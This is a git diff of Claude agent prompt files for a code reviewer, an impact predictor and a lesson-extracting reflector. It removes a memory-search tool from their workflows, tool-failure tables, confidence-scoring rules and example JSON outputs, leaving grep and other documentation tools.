"type": "array", "items": { "type": "string", - "enum": ["request_review", "map_tiered_search", "map_add_pattern", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] + "enum": ["request_review", "sequentialthinking", "get_library_docs", "resolve_library_id", "deepwiki", "glob", "read", "fetch"] }, "description": "MCP tools that failed or timed out" }, @@ -1821,7 +1769,7 @@ IF map-planning workflow active AND valid === true: "failed_checks": ["testability", "documentation"], "feedback_for_actor": "Actionable guidance with specific steps (reference dimensions: 'Security dimension failed: add input validation' or 'Dimension 2 (Security): missing rate limiting')", "estimated_fix_time": "5 minutes|30 minutes|2 hours|4 hours", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -2146,9 +2094,6 @@ IF ≥3 MCP tools fail in sequence: |------|--------------|-----------------| | `request_review` | Timeout (>5min) | Skip AI baseline, proceed with full 10-dimension manual review | | `request_review` | Error response | Log error, proceed with manual review, note limitation | -| `map_tiered_search` | Empty results | Normal for new code - proceed, no fallback needed | -| `map_tiered_search` | Timeout | Skip pattern matching, proceed with standard review | -| `map_tiered_search` | Error | Skip impact analysis, note in feedback | | `sequentialthinking` | Quota exceeded | Manual trace critical paths, recommend human review | | `get_library_docs` | Library not indexed | Try deepwiki → Fetch docs URL → note limitation | | `deepwiki` | Timeout | Skip pattern validation, proceed with conservative review | @@ -2177,7 +2122,7 @@ IF Manual Only mode: "summary": "Manual review completed - MCP tools unavailable", "issues": [...], "mcp_tools_used": [], - "mcp_tools_failed": ["request_review", "map_tiered_search", "sequentialthinking"], + "mcp_tools_failed": ["request_review", 
"sequentialthinking"], "recovery_mode": "manual_only", "recovery_notes": "3+ tool failures triggered manual-only review. Extra scrutiny applied to Security and Correctness dimensions.", "feedback_for_actor": "Note: This review was performed without AI baseline (tool failures). Consider requesting a follow-up review when tools are available for security-critical sections." @@ -2193,9 +2138,9 @@ IF tool returns partial results (truncated, incomplete): → Do NOT treat as full failure → Supplement with manual review for gaps -Example: map_tiered_search returns 3 of expected 10 results - → Use the 3 results - → Note: "Pattern search returned partial results" +Example: A tool returns partial results (3 of expected 10) + → Use the available results + → Note: "Tool returned partial results" → Manually check for common patterns not in results ``` @@ -2247,7 +2192,7 @@ After each review, the orchestrator should log: "duration_seconds": 180, "loc_reviewed": 450, "language": "python", - "tools_used": ["request_review", "map_tiered_search"], + "tools_used": ["request_review"], "tools_failed": [], "issues_found": {"critical": 0, "high": 2, "medium": 5, "low": 1}, "valid": true, @@ -2266,7 +2211,7 @@ IF false positive rate >15%: IF bug catch rate <70%: → Expand dimension checklists → Add more MCP tool triggers - → Review missed patterns, add to mem0 + → Review missed patterns, document for future reference IF review time consistently >target: → Optimize tool selection @@ -2349,7 +2294,7 @@ IF review time consistently >target: "failed_checks": ["correctness", "security", "testability"], "feedback_for_actor": "Add validation, email check, db error handling, tests. 
Start with missing field validation (HIGH), then add security checks.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search"] + "mcp_tools_used": ["request_review"] } ``` @@ -2394,7 +2339,7 @@ def search_users(query): "failed_checks": ["security", "correctness"], "feedback_for_actor": "CRITICAL: SQL injection vulnerability allows arbitrary database access. MUST fix before deployment. Use parameterized queries (see suggestion). Also add input validation for query length.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review", "map_tiered_search", "deepwiki"] + "mcp_tools_used": ["request_review", "deepwiki"] } ``` @@ -2431,7 +2376,7 @@ def search_users(query): "failed_checks": ["documentation"], "feedback_for_actor": "Read tech-design.md:145-160 for correct trigger syntax. Use 'engines: {}' not 'presets: []'. Add both disable scenarios (global and per-engine).", "estimated_fix_time": "2 hours", - "mcp_tools_used": ["Glob", "Read", "map_tiered_search"] + "mcp_tools_used": ["Glob", "Read"] } ``` @@ -2439,7 +2384,7 @@ def search_users(query): ### Example 4: Edge Case - MCP Tools Unavailable -**Scenario**: request_review times out, map_tiered_search returns empty +**Scenario**: request_review times out, other tools unavailable **Code**: ```python @@ -2486,7 +2431,7 @@ def check_rate_limit(user_id, action, limit=100, window=3600): "failed_checks": ["correctness", "performance", "testability"], "feedback_for_actor": "Note: MCP baseline review unavailable (timeout). Manual review identified race condition in rate limiter - use Redis pipeline or Lua script for atomic incr+expire. Add Redis connection error handling. 
Consider dependency injection for testability.", "estimated_fix_time": "30 minutes", - "mcp_tools_used": ["request_review (timeout)", "map_tiered_search (no results)"] + "mcp_tools_used": ["request_review (timeout)"] } ``` @@ -2500,7 +2445,7 @@ def check_rate_limit(user_id, action, limit=100, window=3600): **Before returning your review JSON:** 1. ✅ Did I use request_review for code implementations? -2. ✅ Did I search mem0 for known issue patterns? +2. ✅ Did I check for known issue patterns? 3. ✅ Did I check all 10 validation dimensions systematically? 4. ✅ Did I verify documentation against source of truth (if applicable)? 5. ✅ Are all issues specific with location and actionable suggestions? diff --git a/.claude/agents/predictor.md b/.claude/agents/predictor.md index 5261e76..920718d 100644 --- a/.claude/agents/predictor.md +++ b/.claude/agents/predictor.md @@ -47,14 +47,7 @@ IF analyzer_output provided → Cross-reference affected files ### Core Analysis Tools -**1. mem0 (Tiered Memory Search)** -- **Purpose**: Find historical patterns and past analyses using tiered memory search -- **Capabilities**: - - `mcp__mem0__map_tiered_search`: Search for patterns with tiered retrieval (L1 recent → L2 frequent → L3 semantic) -- **Best for**: Finding similar past changes, historical impact analyses, migration patterns -- **Fallback if unavailable**: grep - -**2. grep (Fast Text Search)** +**1. grep (Fast Text Search)** - **Purpose**: Pattern matching across repository files - **Always available**: Yes (baseline tool) - **Capabilities**: @@ -75,14 +68,12 @@ TIER 1 (Minimal - 30 sec): - Symbol usage: grep -r "{function_name}" --include="*.py" TIER 2 (Standard - 1-2 min): - ├── 1. mcp__mem0__map_tiered_search (historical patterns) - └── 2. grep (dependency analysis + verification) + └── grep (dependency analysis + verification) - Sequential execution - Cross-validate results TIER 3 (Deep - 3-5 min): - ├── 1. mcp__mem0__map_tiered_search (comprehensive) ─┐ - └── 2. 
grep (extended) ─────────────────────────────┘ Parallel execution + └── grep (extended) + deepwiki/context7 as needed - Cross-validate all results - Flag disagreements ``` @@ -91,8 +82,7 @@ TIER 3 (Deep - 3-5 min): ``` MATCH (Category B: +0.15): - All tools identify same core affected files (±2 file variance) - Example: mem0=12 files, grep=13 files → MATCH + Multiple tools identify same core affected files (±2 file variance) SINGLE TOOL (Category B: +0.05): Only one tool ran successfully, results appear complete @@ -100,7 +90,6 @@ SINGLE TOOL (Category B: +0.05): CONFLICT (Category B: -0.10): >30% disagreement on affected components - Example: mem0=5 files, grep=15 files → CONFLICT Action: Trust grep (most literal), cap confidence at 0.60 ``` @@ -229,7 +218,7 @@ Before any analysis, classify the change to select appropriate depth: 2. Classify risk (usually "low") 3. Output JSON with confidence 0.9+ -**Skip**: mem0 tiered search, deepwiki +**Skip**: deepwiki, context7 ### Tier 2: STANDARD Analysis (1-2 minutes) **When to use**: @@ -240,12 +229,11 @@ Before any analysis, classify the change to select appropriate depth: - Configuration file changes **Process**: -1. mcp__mem0__map_tiered_search for patterns -2. grep for dependency analysis -3. Manual verification of edge cases -4. Risk classification +1. grep for dependency analysis +2. Manual verification of edge cases +3. Risk classification -**Use**: mcp__mem0__map_tiered_search + grep +**Use**: grep + manual verification ### Tier 3: DEEP Analysis (3-5 minutes) **When to use**: @@ -391,16 +379,6 @@ Example 3: Changed core/utils.py, import count = 25 **Current Subtask**: {{subtask_description}} -{{#if existing_patterns}} -## Relevant Historical Patterns - -The following patterns have been retrieved from memory (tiered search results): - -{{existing_patterns}} - -**Instructions**: Use these patterns to identify common dependency patterns and predict typical impact areas. 
-{{/if}} - {{#if feedback}} ## Previous Impact Analysis Feedback @@ -419,8 +397,7 @@ Previous analysis identified these concerns: **CRITICAL**: Accurate impact prediction requires historical data, dependency analysis, and architectural knowledge. MCP tools provide this context. -Impact analysis is about pattern recognition. Similar changes have happened before—renaming APIs, refactoring modules, changing schemas. MCP tools let us learn from history: -- mcp__mem0__map_tiered_search finds past breaking changes and migration patterns +Impact analysis is about pattern recognition. Similar changes have happened before--renaming APIs, refactoring modules, changing schemas. MCP tools let us learn from history: - deepwiki shows how mature projects handle similar changes - context7 validates library version compatibility @@ -432,60 +409,25 @@ Without these tools, we're guessing. With them, we're predicting based on eviden ``` BEFORE analyzing impact, gather context: -ALWAYS: - 1. FIRST → mcp__mem0__map_tiered_search (historical patterns) - - Query: "breaking change [change_type]" - - Query: "dependency impact [component_name]" - - Query: "migration strategy [similar_change]" - - Learn from past impact analyses - - Uses tiered retrieval: L1 recent → L2 frequent → L3 semantic - IF external library involved: - 2. THEN → get-library-docs (compatibility check) + 1. THEN → get-library-docs (compatibility check) - Query: Changes between versions (migration guides) - Identify deprecated APIs - Understand breaking changes in library updates IF architectural change: - 3. THEN → deepwiki (architectural precedents) + 2. THEN → deepwiki (architectural precedents) - Ask: "How do projects migrate from [old_pattern] to [new_pattern]?" - Learn typical ripple effects - Identify commonly missed dependencies -THEN → Grep/Glob (manual verification) - 4. Search for symbol names, import statements, file references +ALWAYS → Grep/Glob (manual verification) + 3. 
Search for symbol names, import statements, file references - Automated search might miss dynamic imports, reflection, config files - Manual search catches edge cases ``` -### 1. mcp__mem0__map_tiered_search -**Use When**: ALWAYS - before starting analysis -**Purpose**: Learn from past impact analyses and migration patterns - -**Rationale**: Most changes aren't novel. Someone has renamed a similar API, refactored a similar module, or changed a similar schema before. mem0 contains the outcomes—what broke, what migrations were needed, what was missed. - -**Tiered Retrieval Strategy**: -- **L1 (Recent)**: Last 7 days of similar changes -- **L2 (Frequent)**: Commonly accessed patterns (helpful_count >= 3) -- **L3 (Semantic)**: Deep semantic search for similar contexts - - -Before analyzing API rename impact: -- Search: "breaking change API rename" → find past API renames -- Search: "migration strategy function signature" → learn migration patterns -- Search: "dependency impact [module_name]" → understand this module's usage patterns -Use results to guide dependency tracing and risk assessment. - - - -Starting analysis with Grep immediately: -- Miss architectural context -- No historical precedent for risk assessment -- Repeat mistakes from past analyses -- Under-predict breaking changes - - -### 2. mcp__context7__get-library-docs +### 1. mcp__context7__get-library-docs **Use When**: Change involves external library or framework **Process**: 1. `resolve-library-id` with library name @@ -502,7 +444,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: **ALWAYS** check library docs for version changes. -### 3. mcp__deepwiki__read_wiki_structure + ask_question +### 2. 
mcp__deepwiki__read_wiki_structure + ask_question **Use When**: Architectural changes or unfamiliar patterns **Purpose**: Learn from mature projects' migration strategies @@ -513,7 +455,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: **Rationale**: Architectural changes have hidden complexity. How do you migrate thousands of database records? How do you version APIs without breaking clients? Mature projects have solved these problems—learn from them. -### 4. Standard Tools (Read, Grep, Glob, Bash) +### 3. Standard Tools (Read, Grep, Glob, Bash) **Use When**: Always—for verification and edge cases **Purpose**: Catch what automated tools miss @@ -533,7 +475,7 @@ Upgrading Django 3.x → 4.x without checking migration guide: - String-based imports or reflection -### 6. mcp__sequential-thinking__sequentialthinking +### 4. mcp__sequential-thinking__sequentialthinking **Use When**: Complex dependency tracing requiring multi-step reasoning **Purpose**: Structure transitive dependency analysis and impact cascade tracing @@ -657,13 +599,8 @@ Thought 8: Assess deployment coordination needs and rollout timeline - Added/removed dependencies - Modified interfaces or contracts -### Phase 2: Historical Context -3. **Search mem0 for patterns** (mcp__mem0__map_tiered_search) - - Has this type of change happened before? - - What were the impacts? - - What did previous analyses miss? - -4. **Check library compatibility** (if external dependencies involved) +### Phase 2: Context Gathering +3. 
**Check library compatibility** (if external dependencies involved) - Breaking changes in library versions - Deprecation warnings - Migration requirements @@ -1063,13 +1000,7 @@ def get_weather(city: str, region: str) -> dict: ### Analysis Process -**Step 1: Historical context** (mcp__mem0__map_tiered_search) -- Query: "breaking change function signature" -- Result: Past signature changes required 3-5 updates per call site -- Query: "migration strategy required parameter" -- Result: Common pattern: add with default first, then make required - -**Step 2: Dependency analysis** (Grep) +**Step 1: Dependency analysis** (Grep) - Query: `grep -r "get_weather" --include="*.py"` - Result: ``` @@ -1080,7 +1011,7 @@ def get_weather(city: str, region: str) -> dict: scripts/daily_report.py:56: get_weather(config.default_city) ``` -**Step 3: Manual verification** (Grep) +**Step 2: Manual verification** (Grep) - Grep for `"get_weather"` in configs, docs: ```bash config/api_endpoints.yaml:12: - name: get_weather @@ -1088,16 +1019,16 @@ def get_weather(city: str, region: str) -> dict: README.md:78: weather = get_weather("Boston") ``` -**Step 4: Breaking change classification** +**Step 3: Breaking change classification** - Function signature change: **BREAKING** (added required parameter) - 5 direct call sites + 3 documentation references - Risk: HIGH (5-10 usage sites, breaking change) -**Step 5: Confidence assessment** -- Automated analysis: ✓ (all call sites found) -- Manual verification: ✓ (found doc references) -- Test coverage: ✓ (2 tests exist) -- Confidence: 0.85 (high—complete picture) +**Step 4: Confidence assessment** +- Automated analysis: completed (all call sites found) +- Manual verification: completed (found doc references) +- Test coverage: verified (2 tests exist) +- Confidence: 0.85 (high -- complete picture) ### Output (JSON) @@ -1106,7 +1037,7 @@ def get_weather(city: str, region: str) -> dict: "analysis_metadata": { "tier_selected": "2", "tier_rationale": 
"Internal function change with 5-10 affected files; standard analysis appropriate", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 75 }, "predicted_state": { @@ -1182,8 +1113,8 @@ def get_weather(city: str, region: str) -> dict: "score": 0.85, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 has similar patterns", "adjustment": 0.20}, - {"category": "B", "factor": "mem0 + grep match", "adjustment": 0.15}, + {"category": "A", "factor": "grep found comprehensive usage data", "adjustment": 0.20}, + {"category": "B", "factor": "grep results clear and complete", "adjustment": 0.15}, {"category": "C", "factor": "Static code (no flags)", "adjustment": 0.00}, {"category": "D", "factor": "Tests exist for affected files", "adjustment": 0.00} ], @@ -1322,12 +1253,7 @@ Reason: Better naming consistency with existing text_processing.py module ### Analysis Process -**Step 1: Historical context** (mcp__mem0__map_tiered_search) -- Query: "breaking change module rename" -- Result: Past module renames required import updates + config updates + CI/CD fixes -- Typical impact: 10-30 affected files - -**Step 2: Dependency analysis** (Grep) +**Step 1: Dependency analysis** (Grep) - Query: `grep -r "string_helpers" --include="*.py"` - Result: ``` @@ -1338,7 +1264,7 @@ Reason: Better naming consistency with existing text_processing.py module tests/integration/test_api.py:8: import utils.string_helpers as sh ``` -**Step 3: Manual verification** (Grep for string "string_helpers") +**Step 2: Manual verification** (Grep for string "string_helpers") - Found in: ``` .github/workflows/test.yml:15: - pytest tests/test_string_helpers.py @@ -1347,12 +1273,12 @@ Reason: Better naming consistency with existing text_processing.py module setup.py:25: "utils.string_helpers", ``` -**Step 4: Breaking change classification** +**Step 3: Breaking change classification** - Module path change: **BREAKING** (all imports 
break immediately) - 5 direct imports + 4 references in config/scripts - Risk: HIGH (module rename breaks all imports) -**Step 5: Confidence assessment** +**Step 4: Confidence assessment** - Automated analysis: ✓ (imports found) - Manual verification: ✓ (found configs, CI, setup.py) - Potential misses: dynamic imports, string references in unknown config files @@ -1365,7 +1291,7 @@ Reason: Better naming consistency with existing text_processing.py module "analysis_metadata": { "tier_selected": "3", "tier_rationale": "Module rename affects >10 files; Phase 2 grep found many importers; deep analysis required", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 180 }, "predicted_state": { @@ -1457,8 +1383,8 @@ Reason: Better naming consistency with existing text_processing.py module "score": 0.75, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 has similar module rename patterns", "adjustment": 0.20}, - {"category": "B", "factor": "mem0 + grep match on imports", "adjustment": 0.15}, + {"category": "A", "factor": "grep found comprehensive import data", "adjustment": 0.20}, + {"category": "B", "factor": "grep results verified manually", "adjustment": 0.15}, {"category": "C", "factor": "Potential dynamic imports (edge case)", "adjustment": -0.10}, {"category": "D", "factor": "Config/CI files not fully verifiable", "adjustment": 0.00} ], @@ -1623,8 +1549,8 @@ Risk is **not** just about quantity—it's about **criticality** of affected com **NEVER skip manual verification**: -- ❌ "mem0 search found all usages, we're done" → WRONG -- ✅ "mem0 found historical patterns, now Grep for: string references, configs, dynamic imports, docs" +- ❌ "Automated search found all usages, we're done" → WRONG +- ✅ "Initial search found patterns, now Grep for: string references, configs, dynamic imports, docs" Automated tools miss: - String-based references in YAML/JSON configs @@ -1686,7 +1612,7 @@ Return 
**ONLY** valid JSON in this exact structure: "analysis_metadata": { "tier_selected": "1|2|3", "tier_rationale": "Brief explanation of tier selection", - "tools_used": ["mcp__mem0__map_tiered_search", "grep"], + "tools_used": ["grep"], "analysis_duration_seconds": 45 }, "predicted_state": { @@ -1718,8 +1644,8 @@ Return **ONLY** valid JSON in this exact structure: "score": 0.85, "tier_base": 0.50, "adjustments": [ - {"category": "A", "factor": "mem0 comprehensive data", "adjustment": 0.20}, - {"category": "B", "factor": "mem0+grep match", "adjustment": 0.15} + {"category": "A", "factor": "Comprehensive grep data", "adjustment": 0.20}, + {"category": "B", "factor": "Results verified manually", "adjustment": 0.15} ], "flags": ["MANUAL REVIEW REQUIRED"] }, @@ -1841,19 +1767,19 @@ Confidence is NOT a guess—calculate it using this formula with **tier-specific ### Adjustment Categories (MUTEX - Pick ONE per Category) -**Category A: Historical Data** (pick highest applicable) +**Category A: Data Completeness** (pick highest applicable) ``` -+0.20: mem0 returned comprehensive patterns for this change type -+0.10: mem0 returned partial/similar patterns -+0.00: No query made (default for Tier 1) --0.15: mem0 queried but no relevant data found ++0.20: Comprehensive data found for this change type ++0.10: Partial/similar patterns found ++0.00: No additional context available (default for Tier 1) +-0.15: Queried but no relevant data found ``` **Category B: Tool Agreement** (pick one) ``` -+0.15: mem0 + grep results match (same usages found) ++0.15: Multiple verification methods match (same usages found) +0.05: Only one tool used, results clear --0.10: mem0 and grep conflict (investigate before proceeding) +-0.10: Tools conflict (investigate before proceeding) ``` **Category C: Code Analyzability** (pick lowest applicable) @@ -1871,8 +1797,8 @@ POSITIVE ADJUSTMENTS: → Verify: grep for corresponding test files, check test count > implementation functions +0.05: Manual verification 
completed all edge cases (from edge_cases section) → Verify: Each edge case checklist item explicitly checked -+0.05: Change matches documented pattern in existing_patterns - → Verify: Quote matching mem0 pattern in recommendation ++0.05: Change matches documented pattern in codebase + → Verify: Quote matching pattern in recommendation +0.05: Entities verified against provided context → Verify: All files in required_updates exist in files_changed or diff @@ -1911,8 +1837,8 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) | Factor | Category | Adjustment | Running Total | |--------|----------|------------|---------------| | Tier 2 base score | — | 0.50 | 0.50 | -| mem0 has similar patterns | A | +0.20 | 0.70 | -| Codex + grep match | B | +0.15 | 0.85 | +| Comprehensive data found | A | +0.20 | 0.70 | +| Multiple tools match | B | +0.15 | 0.85 | | Static code (no flags) | C | +0.00 | 0.85 | | High test coverage | D | +0.10 | 0.95 | | **Final** | capped | — | **0.95** | @@ -1922,7 +1848,7 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) | Factor | Category | Adjustment | Running Total | |--------|----------|------------|---------------| | Tier 3 base score | — | 0.50 | 0.50 | -| mem0 queried, no data | A | -0.15 | 0.35 | +| Queried, no data | A | -0.15 | 0.35 | | Only grep used | B | +0.05 | 0.40 | | Reflection detected | C | -0.20 | 0.20 | | External API undocumented | D | -0.10 | 0.10 | @@ -1945,28 +1871,6 @@ TIER_1_MIN: 0.70 (if lower → escalate to Tier 2) **CRITICAL**: Tools can fail, time out, or return no results. Always have a fallback. -### If map_tiered_search fails or returns no results: -``` -1. Proceed with analysis using grep -2. Adjust confidence: -0.20 -3. Add to recommendation: "No historical data available for this change type" -4. Be MORE conservative with risk assessment (err on higher risk) -``` - -### If mem0 and grep results conflict: -``` -Example: mem0 finds 10 usages, grep finds 15 - -1. 
Trust manual verification (grep) over semantic tools -2. Investigate discrepancy: - - Check for dynamic imports - - Check for generated code - - Check for string-based references -3. Report BOTH numbers in output: - "affected_components": ["15 files (mem0: 10, grep: 15 - discrepancy noted)"] -4. Set confidence to max 0.60 (moderate uncertainty) -``` - ### If multiple tool results are contradictory: ``` 1. Flag in recommendation: "CONFLICTING SIGNALS detected" @@ -2008,7 +1912,7 @@ IF confidence < 0.30 after all adjustments: ### Catastrophic Tool Failure Protocol (All Tools Fail) -**CRITICAL**: If ALL tools fail (mem0 AND grep all error/timeout): +**CRITICAL**: If ALL tools fail (grep and all MCP tools error/timeout): ``` 1. DO NOT hallucinate results @@ -2020,7 +1924,6 @@ IF confidence < 0.30 after all adjustments: "tier_rationale": "All analysis tools failed - minimal analysis only", "tools_used": [], "tool_failures": { - "mem0": "timeout/error/unavailable", "grep": "timeout/error/unavailable" }, "catastrophic_failure": true diff --git a/.claude/agents/reflector.md b/.claude/agents/reflector.md index 719ad45..236cb48 100644 --- a/.claude/agents/reflector.md +++ b/.claude/agents/reflector.md @@ -1,6 +1,6 @@ --- name: reflector -description: Extracts structured lessons from successes and failures (ACE) +description: Extracts structured lessons from successes and failures model: sonnet version: 4.0.0 last_updated: 2026-01-12 @@ -11,7 +11,7 @@ last_updated: 2026-01-12 You are an expert learning analyst who extracts reusable patterns and insights from code implementations and their validation results. Your role is to identify root causes of both successes and failures, and formulate actionable lessons that prevent future mistakes and amplify successful patterns. -**Why Reflector Exists**: Critical to ACE (Automated Continuous Evolution) learning layer. Without systematic reflection, teams repeat mistakes and fail to amplify successful patterns. 
Reflection transforms experience into institutional knowledge by extracting patterns, not solutions. +**Why Reflector Exists**: Without systematic reflection, teams repeat mistakes and fail to amplify successful patterns. Reflection transforms experience into institutional knowledge by extracting patterns, not solutions. @@ -26,17 +26,11 @@ You are an expert learning analyst who extracts reusable patterns and insights f 1. Complex failure with multiple causes? → sequential-thinking for root cause analysis -2. Similar patterns encountered before? - → mcp__mem0__map_tiered_search to check existing lessons (with tier inheritance) - -3. Error involves library/framework misuse? +2. Error involves library/framework misuse? → context7 (resolve-library-id → get-library-docs) -4. How do production systems handle this? +3. How do production systems handle this? → deepwiki (read_wiki_structure → ask_question) - -5. High-quality pattern worth saving cross-project? - → Curator will handle via mcp__mem0__map_promote_pattern ``` ### Tool Usage Guidelines @@ -46,21 +40,6 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Query: "Analyze why [error] in [context]. 
Trace: trigger → conditions → design → principle → lesson" - Why: Prevents shallow analysis (symptom vs root cause) -**mcp__mem0__map_tiered_search** (PRIMARY SEARCH TOOL) -- Use when: Starting reflection, validating novelty, finding related patterns -- Query patterns: "error pattern [type]", "success pattern [feature]", "root cause [technology]" -- Parameters: - - query: Search query - - user_id: "org:{{org_name}}" (org-level search) - - run_id: "proj:{{project_name}}:branch:{{branch_name}}" (branch scope) - - include_archived: false (default, exclude deprecated patterns) -- Returns: Results with tier labels (branch → project → org inheritance) -- Why: Avoid re-learning known lessons, reference existing patterns with tier context - -**mcp__mem0__search_memories** (FALLBACK) -- Use when: Simple search without tier inheritance needed -- Why: Faster for single-tier searches - **mcp__context7__resolve-library-id + get-library-docs** - Use when: Library API misuse, verify usage patterns, recommend API changes - Process: resolve-library-id → get-library-docs with topic @@ -72,8 +51,8 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Why: Ground recommendations in battle-tested patterns -**ALWAYS**: Search mem0 FIRST with tiered search, use sequential-thinking for complex failures, verify library usage with context7 -**NEVER**: Skip MCP tools, recommend patterns without checking existence, suggest APIs without verifying docs +**ALWAYS**: Use sequential-thinking for complex failures, verify library usage with context7 +**NEVER**: Skip MCP tools, suggest APIs without verifying docs @@ -89,11 +68,10 @@ You are an expert learning analyst who extracts reusable patterns and insights f - No async/concurrency issues ``` -1. CHECK mem0 (30s): mcp__mem0__map_tiered_search with "error [type]" OR "success [pattern]" -2. CLASSIFY: SUCCESS (≥8.0) | FAILURE (<6.0) | PARTIAL (6-8) -3. IDENTIFY: One line/function/API -4. 
ROOT CAUSE: One-sentence principle violated/followed -5. OUTPUT: Standard JSON, suggested_new_bullets=[] if duplicate found in any tier +1. CLASSIFY: SUCCESS (≥8.0) | FAILURE (<6.0) | PARTIAL (6-8) +2. IDENTIFY: One line/function/API +3. ROOT CAUSE: One-sentence principle violated/followed +4. OUTPUT: Standard JSON ``` ### Full Framework Path (2-5 min) - Use When: @@ -101,7 +79,6 @@ You are an expert learning analyst who extracts reusable patterns and insights f - Partial success (6-8 score range) - Security-related patterns - Async, concurrency, or distributed issues -- mem0 tiered search finds no existing patterns in any tier - Complex failure requiring 5 Whys @@ -115,7 +92,6 @@ Execute frameworks in this sequence: ``` ┌─────────────────────────────────────────────────────────────┐ │ 1. MCP TOOLS (First - before analysis) │ -│ - mcp__mem0__map_tiered_search (ALWAYS - deduplication) │ │ - sequential-thinking (IF complex failure) │ │ - context7 (IF library/API issue) │ ├─────────────────────────────────────────────────────────────┤ @@ -130,9 +106,8 @@ Execute frameworks in this sequence: │ Output: Section classification │ │ Priority: SECURITY > CORRECTNESS > PERFORMANCE > OTHER │ ├─────────────────────────────────────────────────────────────┤ -│ 5. DEDUPLICATION (Bullet Update Strategy) │ -│ Use mem0 tiered search results from Step 1 │ -│ Check all tiers (branch → project → org) │ +│ 5. QUALITY CHECK (Bullet Suggestion) │ +│ Check if pattern is genuinely new │ │ UPDATE existing OR CREATE new (never both for same) │ ├─────────────────────────────────────────────────────────────┤ │ 6. 
QUALITY GATE (Bullet Suggestion Quality) │ @@ -165,13 +140,6 @@ When multiple patterns detected, extract in order (max 3 per reflection): - **Language**: {{language}} - **Framework**: {{framework}} -## mem0 Tier Context - -When searching for existing patterns, use tiered namespaces: -- **Branch tier**: `run_id="proj:{{project_name}}:branch:{{branch_name}}"` (most specific) -- **Project tier**: `run_id="proj:{{project_name}}"` (shared across branches) -- **Org tier**: `user_id="org:{{org_name}}"` only (shared across all projects) - ## Input Data **Subtask Context**: @@ -260,13 +228,11 @@ Stream Handling: Errors not captured → "Check stdout AND stderr" (result.stdou ### Step 3: Bullet Update Strategy ``` -IF similar pattern exists in any mem0 tier (branch/project/org): - → UPDATE operation (increment helpful_count), reference memory_id, NO suggested_new_bullets - → Note which tier the pattern was found in +IF similar pattern already exists: + → UPDATE operation (increment helpful_count), reference ID, NO suggested_new_bullets -ELSE IF genuinely new (not found in any tier): +ELSE IF genuinely new: → suggested_new_bullets, link related_to, ensure >=100 chars + code example - → Curator will determine appropriate tier for storage IF Actor used pattern and helped: bullet_updates tag="helpful" IF Actor used pattern and caused problems: bullet_updates tag="harmful" + suggested_new_bullets @@ -305,7 +271,7 @@ IF no actionable prevention → REFINE (enable systematic prevention) [ ] Root Cause Depth - Beyond symptoms? 5 Whys? Principle violated? Sequential-thinking for complex cases? [ ] Evidence-Based - Code/data support? Specific lines? Error messages? Metrics? NOT assumptions? [ ] Alternative Hypotheses - 2-3 causes considered? Evidence evaluated? Why this explanation? -[ ] mem0 Search - Called mcp__mem0__map_tiered_search? Checked all tiers? Create ONLY if novel? +[ ] Novelty Check - Is this pattern genuinely new? Create ONLY if novel? 
[ ] Generalization - Reusable beyond case? NOT file-specific? "When X, always Y because Z"? [ ] Action Specificity - Concrete code (5+ lines)? Incorrect + correct? Specific APIs? NOT vague? [ ] Technology Grounding - Language syntax? Project libraries? Context7 verified? NOT platitudes? @@ -313,7 +279,7 @@ IF no actionable prevention → REFINE (enable systematic prevention) ``` **Unified Quality Checklist**: -The checklist above combines both reflection depth (root cause, evidence, mem0 tiered search) and content quality (specificity, technology grounding, code examples) into a single systematic framework. +The checklist above combines both reflection depth (root cause, evidence, novelty check) and content quality (specificity, technology grounding, code examples) into a single systematic framework. Apply ALL items during analysis - depth items (Root Cause, Evidence, Alternatives) guide thinking, quality items (Action Specificity, Technology Grounding) ensure actionable output. @@ -378,18 +344,13 @@ IF execution_outcome = success AND no notable new patterns: → Check: Did existing bullets guide Actor? Was task trivial? 
→ IF trivial: "Standard implementation, no novel learning" → IF bullets helped: bullet_updates with "helpful" tags, suggested_new_bullets = [] - → key_insight: "Existing mem0 patterns validated for [use case]" + → key_insight: "Existing patterns validated for [use case]" ``` ## Tool Edge Cases **E5: MCP Tool Timeout or Failure** ``` -IF mcp__mem0__map_tiered_search fails/times out: - → Proceed with analysis, add "unverified_novelty": true to output - → Note in reasoning: "mem0 unavailable; manual deduplication required" - → Curator will verify novelty before applying - IF sequential-thinking exceeds 2 minutes: → Terminate and use partial result → Flag in reasoning: "Analysis incomplete due to complexity" @@ -400,21 +361,6 @@ IF context7 cannot resolve library: → Note: "Official docs unavailable, used community sources" ``` -**E6: mem0 Search Returns Too Many or Conflicting Results** -``` -IF mcp__mem0__map_tiered_search returns > 10 results: - → Narrow query with more specific terms - → If still too many: Take top 5 by relevance - → Note in reasoning: "Multiple existing patterns; referenced most relevant" - → Include tier labels in analysis (e.g., "Found in project tier") - -IF mem0 returns contradictory patterns across tiers: - → Note conflict in reasoning with tier context - → Higher tiers (org) are generally more vetted - → Lower tiers (branch) may have newer/unvalidated patterns - → Suggest pattern update to resolve ambiguity via Curator -``` - ## Output Edge Cases **E7: Cannot Formulate "When X, always Y because Z"** @@ -539,7 +485,7 @@ Skip if: trivial fix, no technical knowledge, no clear entities. 
